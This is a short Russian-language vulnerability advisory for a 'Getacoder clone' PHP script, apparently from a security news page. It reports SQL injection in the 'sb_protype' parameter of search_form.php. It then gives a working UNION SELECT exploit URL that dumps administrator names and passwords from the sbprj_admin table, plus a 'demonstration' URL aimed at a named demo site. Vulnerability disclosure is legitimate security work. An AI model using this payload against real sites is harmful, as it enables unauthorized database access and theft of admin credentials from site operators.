Программа: Getacoder clone

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «sb_protype» сценарием search_form.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

www.[target].com/Script/search_form.php?sb_showresult=1&sb_protype=
-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--

Демонстрация:

http://www.demosgreatclone.com/getacoder/search_form.php?sb_showresult= 1&sb_protype=-2+UNION+SELECT+1,
concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--

Открыть комментарии
Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии